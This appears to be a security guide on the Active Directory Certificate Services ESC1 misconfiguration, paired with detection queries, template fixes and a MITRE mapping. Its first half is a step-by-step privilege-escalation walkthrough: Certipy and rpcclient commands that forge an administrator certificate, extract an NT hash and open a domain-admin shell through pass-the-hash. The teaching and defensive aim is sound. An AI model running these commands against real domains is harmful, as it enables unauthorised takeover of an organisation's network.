ADCS-ESC1: Misconfigured Certificate Templates Leading to Full Domain Compromise

Executive Summary

Active Directory Certificate Services (ADCS) ESC1 is a critical misconfiguration that allows attackers with low-privileged domain credentials to escalate to Domain Administrator. This vulnerability exists when certificate templates are improperly configured, allowing users to request certificates on behalf of any domain account, including administrators.

In this guide, we'll cover what ESC1 is, how attackers exploit it, the tools used, and how to defend your environment.

What is ADCS-ESC1?

Understanding Active Directory Certificate Services

Active Directory Certificate Services (ADCS) is Microsoft's Public Key Infrastructure (PKI) solution that manages digital certificates in Windows environments. ADCS enables:

• User and computer authentication
• Smart card logon
• Code signing
• Secure email (S/MIME)
• Network access control (802.1x)

The ESC1 Vulnerability

ESC1 occurs when a certificate template has all of the following misconfigurations:

1. Enrollee Supplies Subject is enabled - Users can specify the Subject Alternative Name (SAN)
2. Client Authentication EKU is present - Certificate can be used for authentication
3. No Manager Approval required - Certificates are issued automatically
4. Domain Users can enroll - Low-privileged users have enrollment rights
5. Template is enabled - The template is published and active

When these conditions exist together, an attacker can:

• Request a certificate for ANY user (including Domain Admin)
• Use that certificate to authenticate as that user
• Maintain access for the certificate's validity period (typically 1-10 years)

Why This Matters

Severity: Critical - Full domain compromise from low-privileged account

Impact:

• Immediate Domain Administrator access
• Long-term persistence (certificates valid for years)
• Survives password resets
• Difficult to detect in standard logs
• Can be renewed before expiration

How Attackers Exploit ESC1

Attack Prerequisites

• Valid domain credentials (any domain user)
• Network access to Domain Controller
• Network access to Certificate Authority

Attack Flow

Low-Priv User -> Enumerate ADCS -> Find ESC1 Template -> Request Admin Certificate -> Authenticate -> Domain Admin

Tools Used in ESC1 Attacks

Offensive Tools

Certipy-AD

• Python-based ADCS exploitation tool
• Enumerates certificate templates
• Identifies vulnerabilities (ESC1-ESC13)
• Requests and authenticates with certificates
• Repository: https://github.com/ly4k/Certipy

RPCClient

• Part of Samba suite
• Queries Active Directory via RPC
• Used to enumerate user SIDs

Impacket

• Python library for network protocols
• Tools for Pass-the-Hash attacks
• Remote command execution (wmiexec, psexec, smbexec)
• Repository: https://github.com/fortra/impacket

NetExec

• Network reconnaissance tool
• Domain enumeration
• Credential validation

Step-by-Step Exploitation

Prerequisites for ESC1 Exploitation:

Before this attack can succeed, the following conditions must be met:

Account Requirements:

• Domain user account - Any authenticated domain user (even low-privileged)
• No special permissions required - Standard domain user privileges are sufficient
• Enrollment rights - User must have enrollment permissions on the vulnerable certificate template (typically granted to "Domain Users" group by default)

Certificate Template Requirements:

• Client Authentication EKU enabled - Template allows certificates to be used for authentication
• "Supply in the request" enabled - Also known as "Enrollee Supplies Subject," this allows the user to specify the Subject Alternative Name (SAN)
• No manager approval required - Certificate issuance is automatic without administrative approval
• Domain Users can enroll - Template permissions allow standard domain users to request certificates
• Template is published - Certificate template must be enabled and available on the Certificate Authority

Infrastructure Requirements:

• Active Directory Certificate Services (ADCS) deployed - Organization must be using ADCS for PKI
• Certificate-based authentication enabled - Domain must accept certificates for Kerberos authentication
• Network access to Certificate Authority - Attacker must be able to reach the CA server (typically port 135 for RPC)

Tools Required:

• Certipy-AD - For certificate enumeration and exploitation
• Impacket suite - For credential extraction and lateral movement
• Network connectivity - To domain controller and certificate authority

Why This Works:

ESC1 exists because the "Enrollee Supplies Subject" setting combined with Client Authentication creates a dangerous combination: any domain user can request a certificate claiming to be any other user (including Domain Admins), and that certificate will be trusted for authentication without verification.

Environment Details

Throughout this demonstration, the following environment details are used:

Domain: EXAMPLE.COM

Domain Controller: 192.168.1.10

Certificate Authority: EXAMPLE-DC-CA

CA Server: DC01.EXAMPLE.COM

Compromised User: testuser

Password: SecurePass123

Target Account: administrator@EXAMPLE.COM

Step 1: Enumerate ADCS and Find Vulnerable Templates

Command:

certipy-ad find -u "testuser@EXAMPLE.COM" -p "SecurePass123" -dc-ip 192.168.1.10 -vulnerable -enabled

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates

[*] Found 45 certificate templates

[*] Finding certificate authorities

[*] Found 1 certificate authority

[*] Found 12 enabled certificate templates

Certificate Authorities

0

CA Name : EXAMPLE-DC-CA

DNS Name : DC01.EXAMPLE.COM

Certificate Subject : CN=EXAMPLE-DC-CA, DC=EXAMPLE, DC=COM

Certificate Serial Number : 1A2B3C4D5E6F7890

Certificate Validity Start : 2023-01-15 08:30:00+00:00

Certificate Validity End : 2028-01-15 08:40:00+00:00

Certificate Templates

0

Template Name : VulnerableUserTemplate

Display Name : Vulnerable User Template

Certificate Authorities : EXAMPLE-DC-CA

Enabled : True

Client Authentication : True

Enrollment Agent : False

Any Purpose : False

Enrollee Supplies Subject : True

Certificate Name Flag : EnrolleeSuppliesSubject

Enrollment Flag : None

Private Key Flag : ExportableKey

Extended Key Usage : Client Authentication

Smart Card Logon

Requires Manager Approval : False

Requires Key Archival : False

Authorized Signatures Required : 0

Validity Period : 5 years

Renewal Period : 6 weeks

Minimum RSA Key Length : 2048

Permissions

Enrollment Permissions

Enrollment Rights : EXAMPLE.COM\Domain Users

EXAMPLE.COM\Authenticated Users

Object Control Permissions

Owner : EXAMPLE.COM\Enterprise Admins

Write Owner Principals : EXAMPLE.COM\Domain Admins

EXAMPLE.COM\Enterprise Admins

Write Dacl Principals : EXAMPLE.COM\Domain Admins

EXAMPLE.COM\Enterprise Admins

Write Property Principals : EXAMPLE.COM\Domain Admins

EXAMPLE.COM\Enterprise Admins

[!] Vulnerabilities

ESC1 : 'EXAMPLE.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

What to Look For:

• [!] Vulnerabilities section shows ESC1
• Enrollee Supplies Subject: True
• Client Authentication: True
• Requires Manager Approval: False
• Domain Users have enrollment rights

Step 2: Obtain Administrator SID

Microsoft patch KB5014754 requires the target user's SID in certificate requests. We need to retrieve this.

Command:

rpcclient -U "EXAMPLE\\testuser%SecurePass123" 192.168.1.10

Sample Output:

rpcclient $>

Query Administrator SID:

lookupnames administrator

Sample Output:

administrator S-1-5-21-3623811015-3361044348-30300820-500 (User: 1)

Note the SID: S-1-5-21-3623811015-3361044348-30300820-500

Type exit to close rpcclient.

Step 3: Request Certificate for Administrator

Now we request a certificate claiming to be the administrator.

Command:

certipy-ad req -u 'testuser@EXAMPLE.COM' -p 'SecurePass123' -dc-ip 192.168.1.10 -ca 'EXAMPLE-DC-CA' -target 'DC01.EXAMPLE.COM' -template 'VulnerableUserTemplate' -upn 'administrator@EXAMPLE.COM' -sid 'S-1-5-21-3623811015-3361044348-30300820-500'

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC

[*] Successfully requested certificate

[*] Request ID is 2847

[*] Got certificate with UPN 'administrator@EXAMPLE.COM'

[*] Certificate object SID is 'S-1-5-21-3623811015-3361044348-30300820-500'

[*] Saved certificate and private key to 'administrator.pfx'

Success Indicators:

• Successfully requested certificate
• Certificate saved to administrator.pfx
• Request ID provided (note for cleanup)

Step 4: Authenticate with Certificate

Use the certificate to obtain administrator credentials.

Command:

certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.10

Sample Output:

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@EXAMPLE.COM

[*] Trying to get TGT...

[*] Got TGT

[*] Saved credential cache to 'administrator.ccache'

[*] Trying to retrieve NT hash for 'administrator'

[*] Got hash for 'administrator@EXAMPLE.COM': aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6

Credentials Obtained:

• NT Hash: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
• Kerberos TGT: administrator.ccache

Step 5: Access Domain Controller

Use Pass-the-Hash to execute commands as Domain Administrator.

Command:

impacket-wmiexec EXAMPLE.COM/administrator@192.168.1.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6'

Sample Output:

Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used

[!] Launching semi-interactive shell - Careful what you execute

[!] Press help for extra shell commands

C:\>whoami

example\administrator

C:\>hostname

DC01

C:\>net user

User accounts for \\DC01

Administrator Guest krbtgt

testuser svcadmin sqlservice

The command completed successfully.

C:\>

Domain Admin access achieved!

Detection Strategies

Event Log Monitoring

Key Event IDs to Monitor:

Event ID 4886 - Certificate Request

• Location: Certificate Authority -> Security Log
• Shows: Who requested a certificate
• Limitation: Doesn't show the SAN value used

Event ID 4887 - Certificate Issued

• Location: Certificate Authority -> Security Log
• Shows: Which template was used and who received it

Event ID 4768 - Kerberos TGT Request

• Location: Domain Controller -> Security Log
• Shows: Authentication type
• ESC1 Indicator: PreAuthType = 16 (PKINIT/Certificate authentication)

Certificate Authority Console

1. Open certsrv.msc on CA server
2. Navigate to "Issued Certificates"
3. Add columns: "Requester Name" and "Subject Alternative Name"
4. Red Flag: Requester Name ≠ SAN (e.g., testuser requests certificate for administrator)

SIEM Detection Query

Example Splunk Query:

index=windows EventCode=4887 OR EventCode=4768

| where (EventCode=4887 AND RequesterName!="administrator") OR (EventCode=4768 AND PreAuthType=16)

| stats count by RequesterName, TargetUserName, ComputerName

Mitigation and Remediation

Fix Vulnerable Templates

Access Certificate Templates:

Run -> certtmpl.msc

For Each Vulnerable Template:

1. Right-click template -> Properties
   
   
2. Subject Name Tab:
   
   
• Change from "Supply in the request"
• To "Build from this Active Directory information"
3. Issuance Requirements Tab:
   
   
• Enable "CA certificate manager approval"
4. Security Tab:
   
   
• Remove "Domain Users" from enrollment rights
• Remove "Authenticated Users" from enrollment rights
• Add only specific security groups that require access

Revoke Malicious Certificates

1. Open certsrv.msc on the Certificate Authority
2. Navigate to "Issued Certificates"
3. Find certificate by Request ID
4. Right-click -> "All Tasks" -> "Revoke Certificate"
5. Select Reason: "Privilege Withdrawal"

Best Practices

Template Configuration:

• Never allow "Supply in the request" unless absolutely necessary
• Always require manager approval for sensitive templates
• Restrict enrollment to specific groups, not Domain Users
• Remove Client Authentication EKU if not required
• Reduce certificate validity periods (use shorter timeframes)

Monitoring:

• Enable audit logging on Certificate Authority (Event IDs 4886, 4887)
• Monitor for certificate requests with mismatched requester/SAN
• Alert on PKINIT authentication (Event ID 4768, PreAuthType=16)
• Regularly audit certificate templates for misconfigurations

Regular Audits: Run vulnerability scans using Certipy or similar tools:

certipy-ad find -u 'auditor@domain.com' -p 'password' -dc-ip <DC-IP> -vulnerable -enabled

Real-World Impact

Threat Actor Usage

APT29 (2022): Used ESC1 to impersonate administrators and maintain persistent access in compromised networks.

UNC5330 (2024): Exploited Ivanti vulnerabilities followed by ESC1 abuse for domain escalation.

Business Impact

• Average Breach Cost: $4.35M (2024)
• Recovery Time: 6-12 months for full domain rebuild
• Certificate Validity: 1-10 years of potential unauthorized access
• Persistence: Survives password resets and standard remediation

MITRE ATT&CK Framework Mapping for ESC1

Primary Technique

T1649 - Steal or Forge Authentication Certificates

• Tactic: Credential Access
• URL: https://attack.mitre.org/techniques/T1649/
• Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Certificate-related misconfigurations enable opportunities for privilege escalation by allowing users to impersonate privileged accounts via identities (SANs) associated with a certificate.

Tactics Covered

TA0006 - Credential Access

• ESC1 enables obtaining administrator authentication certificates

TA0004 - Privilege Escalation

• Escalating from low-privileged user to Domain Administrator via certificate impersonation

TA0003 - Persistence

• Long-term access via certificate validity (typically 1-10 years), surviving password resets

Related Sub-Techniques

T1078.002 - Valid Accounts: Domain Accounts

• Tactics: Defense Evasion, Persistence, Privilege Escalation, Initial Access
• URL: https://attack.mitre.org/techniques/T1078/002/
• Once certificate is obtained, it functions as valid domain account credentials for authentication

Detection Data Sources (per MITRE)

• Active Directory: Active Directory Credential Request
• Active Directory: Active Directory Object Modification
• Application Log: Application Log Content
• Logon Session: Logon Session Creation
• Windows Registry: Windows Registry Key Access

Key MITRE References

• SpecterOps Certified Pre-Owned Whitepaper - Referenced in T1649 as foundational research
• Contributors: Lee Christensen (SpecterOps), Thirumalai Natarajan (Mandiant)
• Technique Created: August 3, 2022
• Last Modified: October 14, 2024

Conclusion

ADCS-ESC1 represents a critical vulnerability that transforms low-privileged access into long-term domain compromise. The combination of easy exploitation, difficult detection, and extended persistence makes this a high-priority security concern for any organization running Active Directory Certificate Services.

Key Takeaways:

1. ESC1 is exploitable with basic domain credentials and publicly available tools
2. Detection is challenging without proper logging and monitoring
3. Impact is severe - full domain compromise with multi-year persistence
4. Remediation is straightforward - fix template configurations and implement proper access controls
5. Prevention is critical - regular audits and security best practices

Organizations must prioritize ADCS security by:

• Auditing certificate templates regularly
• Implementing least-privilege access controls
• Enabling comprehensive monitoring
• Training administrators on ADCS security
• Testing defenses through purple team exercises

The tools and knowledge to exploit ADCS are freely available. The question is not whether attackers will target your certificate infrastructure, but when. Proactive security measures are essential to protect against this "privilege escalation as a service" vulnerability.

References

1. SpecterOps - Certified Pre-Owned: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf
2. Black Hills Information Security - ADCS Abuse Guide: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/
3. Microsoft ADCS Documentation: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/
4. Certipy GitHub Repository: https://github.com/ly4k/Certipy
5. Impacket GitHub Repository: https://github.com/fortra/impacket